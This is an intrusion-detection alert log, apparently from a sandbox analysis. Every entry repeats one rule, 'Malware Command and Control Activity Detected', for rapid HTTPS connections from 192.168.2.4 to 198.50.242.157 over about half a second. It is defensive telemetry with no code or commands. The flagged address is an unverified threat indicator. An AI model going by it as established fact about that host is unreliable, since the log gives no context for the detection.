2025-01-11T20:08:05.334659+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50319	198.50.242.157	443	TCP
2025-01-11T20:08:05.341021+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50320	198.50.242.157	443	TCP
2025-01-11T20:08:05.341942+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50321	198.50.242.157	443	TCP
2025-01-11T20:08:05.345597+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50322	198.50.242.157	443	TCP
2025-01-11T20:08:05.347527+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50323	198.50.242.157	443	TCP
2025-01-11T20:08:05.348695+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50324	198.50.242.157	443	TCP
2025-01-11T20:08:05.350196+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50325	198.50.242.157	443	TCP
2025-01-11T20:08:05.351405+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50326	198.50.242.157	443	TCP
2025-01-11T20:08:05.352688+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50327	198.50.242.157	443	TCP
2025-01-11T20:08:05.354967+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50328	198.50.242.157	443	TCP
2025-01-11T20:08:05.356286+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50329	198.50.242.157	443	TCP
2025-01-11T20:08:05.357628+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50330	198.50.242.157	443	TCP
2025-01-11T20:08:05.359034+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50331	198.50.242.157	443	TCP
2025-01-11T20:08:05.360304+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50332	198.50.242.157	443	TCP
2025-01-11T20:08:05.361783+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50333	198.50.242.157	443	TCP
2025-01-11T20:08:05.363458+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50334	198.50.242.157	443	TCP
2025-01-11T20:08:05.365090+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50335	198.50.242.157	443	TCP
2025-01-11T20:08:05.368814+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50336	198.50.242.157	443	TCP
2025-01-11T20:08:05.370642+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50337	198.50.242.157	443	TCP
2025-01-11T20:08:05.371891+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50338	198.50.242.157	443	TCP
2025-01-11T20:08:05.373679+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50339	198.50.242.157	443	TCP
2025-01-11T20:08:05.374905+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50340	198.50.242.157	443	TCP
2025-01-11T20:08:05.376980+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50341	198.50.242.157	443	TCP
2025-01-11T20:08:05.378231+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50342	198.50.242.157	443	TCP
2025-01-11T20:08:05.379784+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50343	198.50.242.157	443	TCP
2025-01-11T20:08:05.381833+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50344	198.50.242.157	443	TCP
2025-01-11T20:08:05.383133+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50345	198.50.242.157	443	TCP
2025-01-11T20:08:05.384132+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50346	198.50.242.157	443	TCP
2025-01-11T20:08:05.385385+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50347	198.50.242.157	443	TCP
2025-01-11T20:08:05.386834+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50348	198.50.242.157	443	TCP
2025-01-11T20:08:05.388281+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50349	198.50.242.157	443	TCP
2025-01-11T20:08:05.389837+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50350	198.50.242.157	443	TCP
2025-01-11T20:08:05.392847+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50351	198.50.242.157	443	TCP
2025-01-11T20:08:05.394675+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50352	198.50.242.157	443	TCP
2025-01-11T20:08:05.396211+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50353	198.50.242.157	443	TCP
2025-01-11T20:08:05.397264+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50354	198.50.242.157	443	TCP
2025-01-11T20:08:05.399202+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50355	198.50.242.157	443	TCP
2025-01-11T20:08:05.400991+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50356	198.50.242.157	443	TCP
2025-01-11T20:08:05.403643+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50357	198.50.242.157	443	TCP
2025-01-11T20:08:05.405378+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50358	198.50.242.157	443	TCP
2025-01-11T20:08:05.406781+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50359	198.50.242.157	443	TCP
2025-01-11T20:08:05.410494+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50361	198.50.242.157	443	TCP
2025-01-11T20:08:05.411750+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50362	198.50.242.157	443	TCP
2025-01-11T20:08:05.413081+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50363	198.50.242.157	443	TCP
2025-01-11T20:08:05.415745+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50364	198.50.242.157	443	TCP
2025-01-11T20:08:05.418331+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50365	198.50.242.157	443	TCP
2025-01-11T20:08:05.419831+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50366	198.50.242.157	443	TCP
2025-01-11T20:08:05.421106+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50367	198.50.242.157	443	TCP
2025-01-11T20:08:05.422933+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50368	198.50.242.157	443	TCP
2025-01-11T20:08:05.425366+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50370	198.50.242.157	443	TCP
2025-01-11T20:08:05.426903+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50371	198.50.242.157	443	TCP
2025-01-11T20:08:05.428101+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50372	198.50.242.157	443	TCP
2025-01-11T20:08:05.429497+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50373	198.50.242.157	443	TCP
2025-01-11T20:08:05.430857+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50374	198.50.242.157	443	TCP
2025-01-11T20:08:05.432295+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50375	198.50.242.157	443	TCP
2025-01-11T20:08:05.433589+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50376	198.50.242.157	443	TCP
2025-01-11T20:08:05.438766+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50378	198.50.242.157	443	TCP
2025-01-11T20:08:05.440922+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50379	198.50.242.157	443	TCP
2025-01-11T20:08:05.442318+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50380	198.50.242.157	443	TCP
2025-01-11T20:08:05.443688+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50381	198.50.242.157	443	TCP
2025-01-11T20:08:05.445005+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50382	198.50.242.157	443	TCP
2025-01-11T20:08:05.446057+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50383	198.50.242.157	443	TCP
2025-01-11T20:08:05.448055+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50384	198.50.242.157	443	TCP
2025-01-11T20:08:05.449711+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50385	198.50.242.157	443	TCP
2025-01-11T20:08:05.451209+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50386	198.50.242.157	443	TCP
2025-01-11T20:08:05.452375+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50387	198.50.242.157	443	TCP
2025-01-11T20:08:05.453851+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50388	198.50.242.157	443	TCP
2025-01-11T20:08:05.455050+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50389	198.50.242.157	443	TCP
2025-01-11T20:08:05.456083+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50390	198.50.242.157	443	TCP
2025-01-11T20:08:05.457642+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50391	198.50.242.157	443	TCP
2025-01-11T20:08:05.463379+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50393	198.50.242.157	443	TCP
2025-01-11T20:08:05.464642+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50394	198.50.242.157	443	TCP
2025-01-11T20:08:05.466200+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50395	198.50.242.157	443	TCP
2025-01-11T20:08:05.467615+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50396	198.50.242.157	443	TCP
2025-01-11T20:08:05.469092+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50397	198.50.242.157	443	TCP
2025-01-11T20:08:05.470400+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50398	198.50.242.157	443	TCP
2025-01-11T20:08:05.471452+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50399	198.50.242.157	443	TCP
2025-01-11T20:08:05.472779+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50400	198.50.242.157	443	TCP
2025-01-11T20:08:05.473922+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50401	198.50.242.157	443	TCP
2025-01-11T20:08:05.475414+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50402	198.50.242.157	443	TCP
2025-01-11T20:08:05.476766+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50403	198.50.242.157	443	TCP
2025-01-11T20:08:05.479495+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50405	198.50.242.157	443	TCP
2025-01-11T20:08:05.483640+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50406	198.50.242.157	443	TCP
2025-01-11T20:08:05.485213+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50407	198.50.242.157	443	TCP
2025-01-11T20:08:05.487863+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50409	198.50.242.157	443	TCP
2025-01-11T20:08:05.489300+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50410	198.50.242.157	443	TCP
2025-01-11T20:08:05.490615+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50411	198.50.242.157	443	TCP
2025-01-11T20:08:05.491640+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50412	198.50.242.157	443	TCP
2025-01-11T20:08:05.492691+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50413	198.50.242.157	443	TCP
2025-01-11T20:08:05.494105+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50414	198.50.242.157	443	TCP
2025-01-11T20:08:05.495446+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50415	198.50.242.157	443	TCP
2025-01-11T20:08:05.496459+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50416	198.50.242.157	443	TCP
2025-01-11T20:08:05.497648+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50417	198.50.242.157	443	TCP
2025-01-11T20:08:05.498999+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50418	198.50.242.157	443	TCP
2025-01-11T20:08:05.501009+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50419	198.50.242.157	443	TCP
2025-01-11T20:08:05.501974+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50420	198.50.242.157	443	TCP
2025-01-11T20:08:05.505042+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50421	198.50.242.157	443	TCP
2025-01-11T20:08:05.505806+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50422	198.50.242.157	443	TCP
2025-01-11T20:08:05.506989+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50423	198.50.242.157	443	TCP
2025-01-11T20:08:05.507854+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50424	198.50.242.157	443	TCP
2025-01-11T20:08:05.509204+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50425	198.50.242.157	443	TCP
2025-01-11T20:08:05.510888+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50426	198.50.242.157	443	TCP
2025-01-11T20:08:05.513536+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50428	198.50.242.157	443	TCP
2025-01-11T20:08:05.514924+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50429	198.50.242.157	443	TCP
2025-01-11T20:08:05.516186+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50430	198.50.242.157	443	TCP
2025-01-11T20:08:05.518032+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50431	198.50.242.157	443	TCP
2025-01-11T20:08:05.519594+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50432	198.50.242.157	443	TCP
2025-01-11T20:08:05.521301+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50433	198.50.242.157	443	TCP
2025-01-11T20:08:05.522926+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50434	198.50.242.157	443	TCP
2025-01-11T20:08:05.526148+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50435	198.50.242.157	443	TCP
2025-01-11T20:08:05.528040+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50436	198.50.242.157	443	TCP
2025-01-11T20:08:05.529895+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50437	198.50.242.157	443	TCP
2025-01-11T20:08:05.531161+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50438	198.50.242.157	443	TCP
2025-01-11T20:08:05.532481+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50439	198.50.242.157	443	TCP
2025-01-11T20:08:05.534060+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50440	198.50.242.157	443	TCP
2025-01-11T20:08:05.536214+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50442	198.50.242.157	443	TCP
2025-01-11T20:08:05.540203+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50443	198.50.242.157	443	TCP
2025-01-11T20:08:05.541715+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50444	198.50.242.157	443	TCP
2025-01-11T20:08:05.543501+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50446	198.50.242.157	443	TCP
2025-01-11T20:08:05.544742+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50447	198.50.242.157	443	TCP
2025-01-11T20:08:05.546173+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50448	198.50.242.157	443	TCP
2025-01-11T20:08:05.547580+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50449	198.50.242.157	443	TCP
2025-01-11T20:08:05.548812+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50450	198.50.242.157	443	TCP
2025-01-11T20:08:05.552802+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50451	198.50.242.157	443	TCP
2025-01-11T20:08:05.557679+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50452	198.50.242.157	443	TCP
2025-01-11T20:08:05.567831+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50453	198.50.242.157	443	TCP
2025-01-11T20:08:05.580422+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50455	198.50.242.157	443	TCP
2025-01-11T20:08:05.584072+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50457	198.50.242.157	443	TCP
2025-01-11T20:08:05.585782+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50458	198.50.242.157	443	TCP
2025-01-11T20:08:05.587249+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50459	198.50.242.157	443	TCP
2025-01-11T20:08:05.590121+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50460	198.50.242.157	443	TCP
2025-01-11T20:08:05.595994+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50461	198.50.242.157	443	TCP
2025-01-11T20:08:05.598693+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50463	198.50.242.157	443	TCP
2025-01-11T20:08:05.599749+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50464	198.50.242.157	443	TCP
2025-01-11T20:08:05.600840+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50465	198.50.242.157	443	TCP
2025-01-11T20:08:05.602261+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50466	198.50.242.157	443	TCP
2025-01-11T20:08:05.603667+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50467	198.50.242.157	443	TCP
2025-01-11T20:08:05.604756+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50468	198.50.242.157	443	TCP
2025-01-11T20:08:05.606149+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50469	198.50.242.157	443	TCP
2025-01-11T20:08:05.607355+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50470	198.50.242.157	443	TCP
2025-01-11T20:08:05.611636+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50472	198.50.242.157	443	TCP
2025-01-11T20:08:05.613201+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50473	198.50.242.157	443	TCP
2025-01-11T20:08:05.614799+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50474	198.50.242.157	443	TCP
2025-01-11T20:08:05.616592+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50475	198.50.242.157	443	TCP
2025-01-11T20:08:05.617708+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50476	198.50.242.157	443	TCP
2025-01-11T20:08:05.618873+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50477	198.50.242.157	443	TCP
2025-01-11T20:08:05.620478+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50478	198.50.242.157	443	TCP
2025-01-11T20:08:05.621204+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50479	198.50.242.157	443	TCP
2025-01-11T20:08:05.623152+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50480	198.50.242.157	443	TCP
2025-01-11T20:08:05.624883+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50482	198.50.242.157	443	TCP
2025-01-11T20:08:05.625789+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50483	198.50.242.157	443	TCP
2025-01-11T20:08:05.626849+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50484	198.50.242.157	443	TCP
2025-01-11T20:08:05.627886+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50485	198.50.242.157	443	TCP
2025-01-11T20:08:05.631598+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50487	198.50.242.157	443	TCP
2025-01-11T20:08:05.634678+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50489	198.50.242.157	443	TCP
2025-01-11T20:08:05.637197+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50490	198.50.242.157	443	TCP
2025-01-11T20:08:05.639070+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50491	198.50.242.157	443	TCP
2025-01-11T20:08:05.642953+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50492	198.50.242.157	443	TCP
2025-01-11T20:08:05.645847+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50493	198.50.242.157	443	TCP
2025-01-11T20:08:05.646868+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50494	198.50.242.157	443	TCP
2025-01-11T20:08:05.649341+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50495	198.50.242.157	443	TCP
2025-01-11T20:08:05.651035+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50496	198.50.242.157	443	TCP
2025-01-11T20:08:05.651780+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50497	198.50.242.157	443	TCP
2025-01-11T20:08:05.653621+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50498	198.50.242.157	443	TCP
2025-01-11T20:08:05.655482+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50499	198.50.242.157	443	TCP
2025-01-11T20:08:05.657513+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50500	198.50.242.157	443	TCP
2025-01-11T20:08:05.661535+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50502	198.50.242.157	443	TCP
2025-01-11T20:08:05.662402+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50503	198.50.242.157	443	TCP
2025-01-11T20:08:05.663841+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50504	198.50.242.157	443	TCP
2025-01-11T20:08:05.668092+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50506	198.50.242.157	443	TCP
2025-01-11T20:08:05.671408+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50507	198.50.242.157	443	TCP
2025-01-11T20:08:05.676759+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50509	198.50.242.157	443	TCP
2025-01-11T20:08:05.680544+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50510	198.50.242.157	443	TCP
2025-01-11T20:08:05.682011+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50511	198.50.242.157	443	TCP
2025-01-11T20:08:05.686758+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50516	198.50.242.157	443	TCP
2025-01-11T20:08:05.687762+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50517	198.50.242.157	443	TCP
2025-01-11T20:08:05.688593+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50518	198.50.242.157	443	TCP
2025-01-11T20:08:05.690025+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50519	198.50.242.157	443	TCP
2025-01-11T20:08:05.691122+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50520	198.50.242.157	443	TCP
2025-01-11T20:08:05.695602+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50522	198.50.242.157	443	TCP
2025-01-11T20:08:05.696407+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50523	198.50.242.157	443	TCP
2025-01-11T20:08:05.699345+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50524	198.50.242.157	443	TCP
2025-01-11T20:08:05.703266+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50525	198.50.242.157	443	TCP
2025-01-11T20:08:05.705018+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50526	198.50.242.157	443	TCP
2025-01-11T20:08:05.705789+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50527	198.50.242.157	443	TCP
2025-01-11T20:08:05.709319+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50530	198.50.242.157	443	TCP
2025-01-11T20:08:05.710175+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50531	198.50.242.157	443	TCP
2025-01-11T20:08:05.710963+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50532	198.50.242.157	443	TCP
2025-01-11T20:08:05.712420+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50533	198.50.242.157	443	TCP
2025-01-11T20:08:05.713350+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50534	198.50.242.157	443	TCP
2025-01-11T20:08:05.716058+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50536	198.50.242.157	443	TCP
2025-01-11T20:08:05.716930+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50537	198.50.242.157	443	TCP
2025-01-11T20:08:05.718959+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50538	198.50.242.157	443	TCP
2025-01-11T20:08:05.719868+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50539	198.50.242.157	443	TCP
2025-01-11T20:08:05.720941+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50540	198.50.242.157	443	TCP
2025-01-11T20:08:05.721841+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50541	198.50.242.157	443	TCP
2025-01-11T20:08:05.722856+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50542	198.50.242.157	443	TCP
2025-01-11T20:08:05.727464+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50546	198.50.242.157	443	TCP
2025-01-11T20:08:05.728457+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50547	198.50.242.157	443	TCP
2025-01-11T20:08:05.729265+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50548	198.50.242.157	443	TCP
2025-01-11T20:08:05.730122+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50549	198.50.242.157	443	TCP
2025-01-11T20:08:05.730978+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50550	198.50.242.157	443	TCP
2025-01-11T20:08:05.731899+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50551	198.50.242.157	443	TCP
2025-01-11T20:08:05.732871+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50552	198.50.242.157	443	TCP
2025-01-11T20:08:05.733901+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50553	198.50.242.157	443	TCP
2025-01-11T20:08:05.735034+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50554	198.50.242.157	443	TCP
2025-01-11T20:08:05.737128+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50556	198.50.242.157	443	TCP
2025-01-11T20:08:05.738342+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50557	198.50.242.157	443	TCP
2025-01-11T20:08:05.739151+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50558	198.50.242.157	443	TCP
2025-01-11T20:08:05.740842+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50559	198.50.242.157	443	TCP
2025-01-11T20:08:05.743615+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50561	198.50.242.157	443	TCP
2025-01-11T20:08:05.744613+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50562	198.50.242.157	443	TCP
2025-01-11T20:08:05.745482+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50563	198.50.242.157	443	TCP
2025-01-11T20:08:05.746442+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50564	198.50.242.157	443	TCP
2025-01-11T20:08:05.747588+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50565	198.50.242.157	443	TCP
2025-01-11T20:08:05.748545+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50566	198.50.242.157	443	TCP
2025-01-11T20:08:05.751794+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50569	198.50.242.157	443	TCP
2025-01-11T20:08:05.753099+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50570	198.50.242.157	443	TCP
2025-01-11T20:08:05.754261+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50571	198.50.242.157	443	TCP
2025-01-11T20:08:05.758238+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50573	198.50.242.157	443	TCP
2025-01-11T20:08:05.777830+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50576	198.50.242.157	443	TCP
2025-01-11T20:08:05.778705+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50577	198.50.242.157	443	TCP
2025-01-11T20:08:05.784528+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50580	198.50.242.157	443	TCP
2025-01-11T20:08:05.785980+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50581	198.50.242.157	443	TCP
2025-01-11T20:08:05.787066+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50582	198.50.242.157	443	TCP
2025-01-11T20:08:05.788028+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50583	198.50.242.157	443	TCP
2025-01-11T20:08:05.789417+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50584	198.50.242.157	443	TCP
2025-01-11T20:08:05.790301+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50585	198.50.242.157	443	TCP
2025-01-11T20:08:05.791763+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50586	198.50.242.157	443	TCP
2025-01-11T20:08:05.793645+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50587	198.50.242.157	443	TCP
